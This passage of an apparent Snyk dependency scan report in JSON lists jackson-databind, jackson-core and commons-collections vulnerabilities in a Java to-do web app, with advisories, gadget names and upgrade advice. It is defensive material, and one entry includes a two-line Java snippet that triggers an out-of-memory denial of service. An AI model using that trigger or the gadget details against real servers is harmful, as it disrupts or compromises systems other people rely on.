utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-14720) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-14719) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-14721) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-19362) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-19360) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-19361) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in com.fasterxml.jackson.core:jackson-core" + }, + "fullDescription": { + "text": "com.fasterxml.jackson.core:jackson-core@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-core@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n# References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-399", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in com.fasterxml.jackson.core:jackson-core" + }, + "fullDescription": { + "text": "com.fasterxml.jackson.core:jackson-core@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-core@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-399", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "shortDescription": { + "text": "Medium severity - Deserialization of Untrusted Data vulnerability in commons-collections:commons-collections" + }, + "fullDescription": { + "text": "(CVE-2015-6420) commons-collections:commons-collections@3.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: commons-collections:commons-collections\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › commons-collections:commons-collections@3.1\n# Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 